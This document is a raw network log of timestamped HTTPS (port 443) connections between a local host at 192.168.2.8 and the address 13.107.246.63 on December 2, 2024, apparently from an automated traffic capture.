                                                                                                                                                                                                        Dec 2, 2024 07:38:52.390386105 CET49841443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.390701056 CET49841443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.390719891 CET4434984113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.390753984 CET49841443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.390762091 CET4434984113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.394706964 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.394746065 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.394809008 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.394980907 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.394995928 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420409918 CET4434984313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420474052 CET4434984313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420552969 CET49843443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420710087 CET49843443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420716047 CET4434984313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420728922 CET49843443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.420733929 CET4434984313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.422945976 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.422966003 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.423041105 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.423185110 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.423192024 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.618653059 CET4434984413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.618726969 CET4434984413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.618787050 CET49844443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.619112968 CET49844443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.619132996 CET4434984413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.619147062 CET49844443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.619153023 CET4434984413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.622451067 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.622488022 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.622564077 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.622708082 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.622720957 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787055016 CET4434984513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787126064 CET4434984513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787198067 CET49845443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787462950 CET49845443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787472010 CET4434984513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787487030 CET49845443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.787492037 CET4434984513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.791069984 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.791109085 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.791198969 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.791388035 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:52.791404009 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.006539106 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.007364988 CET49842443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.007400990 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.007894993 CET49842443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.007900000 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.597800970 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.597873926 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.597935915 CET49842443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.598139048 CET49842443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.598159075 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.598170042 CET49842443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.598176956 CET4434984213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.601157904 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.601190090 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.601277113 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.601413965 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:53.601424932 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.140866041 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.141350031 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.141366005 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.141835928 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.141841888 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.176559925 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.177104950 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.177150011 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.177612066 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.177619934 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.408463955 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.415281057 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.415311098 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.416122913 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.416129112 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.510873079 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.523296118 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.523323059 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.526731014 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.526736021 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.581629992 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.581702948 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.581753969 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.585266113 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.585283995 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.585299969 CET49847443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.585305929 CET4434984713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.620630026 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.620711088 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.620763063 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.637141943 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.637165070 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.637177944 CET49846443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.637186050 CET4434984613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.648964882 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.648998976 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.649055004 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.649769068 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.649782896 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.651777029 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.651810884 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.651865005 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.651983976 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.651998043 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.853634119 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.853719950 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.853840113 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.854068995 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.854089975 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.854099989 CET49848443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.854110003 CET4434984813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.857248068 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.857280970 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.857438087 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.857620001 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.857630014 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952147007 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952210903 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952344894 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952651978 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952668905 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952678919 CET49849443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.952683926 CET4434984913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.955770969 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.955801010 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.955876112 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.956027985 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:54.956042051 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.381710052 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.382399082 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.382436037 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.382896900 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.382905960 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.827986002 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.828083038 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.828200102 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.828457117 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.828484058 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.828515053 CET49850443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.828524113 CET4434985013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.832367897 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.832406044 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.832473993 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.832655907 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:55.832664967 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.428890944 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.429534912 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.429560900 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.430027962 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.430033922 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.498769999 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.499296904 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.499335051 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.499820948 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.499830008 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.573970079 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.574729919 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.574760914 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.575261116 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.575267076 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.819983006 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.820677996 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.820708036 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.821198940 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.821203947 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.873545885 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.873627901 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.873693943 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.873987913 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.874015093 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.874030113 CET49851443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.874038935 CET4434985113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.877177000 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.877208948 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.877280951 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.877451897 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.877465010 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.953232050 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.953303099 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.953406096 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.994661093 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.994694948 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.994718075 CET49852443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.994725943 CET4434985213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.997955084 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.997988939 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.998081923 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.998215914 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:56.998229980 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.013820887 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.013896942 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.013971090 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.014581919 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.014605999 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.014619112 CET49853443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.014625072 CET4434985313.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.060615063 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.060674906 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.060745955 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.185910940 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.185961008 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.273463011 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.273545980 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.273622990 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.274019003 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.274044037 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.274055004 CET49854443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.274061918 CET4434985413.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.278624058 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.278681993 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.278759003 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.279019117 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.279048920 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.716671944 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.717286110 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.717312098 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.717828035 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:57.717832088 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171005011 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171087980 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171371937 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171904087 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171927929 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171941042 CET49855443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.171947002 CET4434985513.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.176207066 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.176259041 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.176331043 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.176511049 CET49860443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.176527023 CET4434986013.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.693510056 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.695244074 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.695275068 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.695758104 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.695764065 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.754059076 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.754956007 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.754991055 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.755409002 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.755417109 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.867855072 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.868585110 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.868613005 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.869081020 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.869091988 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.874716997 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.875341892 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.875368118 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.875834942 CET49857443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:58.875849009 CET4434985713.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137486935 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137559891 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137665033 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137939930 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137964010 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137975931 CET49856443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.137983084 CET4434985613.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.141493082 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.141537905 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.141623020 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.141807079 CET49861443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.141822100 CET4434986113.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189268112 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189347982 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189397097 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189559937 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189583063 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189604044 CET49858443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.189610958 CET4434985813.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.192815065 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.192859888 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.192918062 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.226130009 CET49862443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.226164103 CET4434986213.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.312284946 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.312354088 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.312414885 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.316596985 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.316610098 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.316626072 CET49859443192.168.2.813.107.246.63
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.316632032 CET4434985913.107.246.63192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:38:59.325443983 CET49863443192.168.2.813.107.246.63
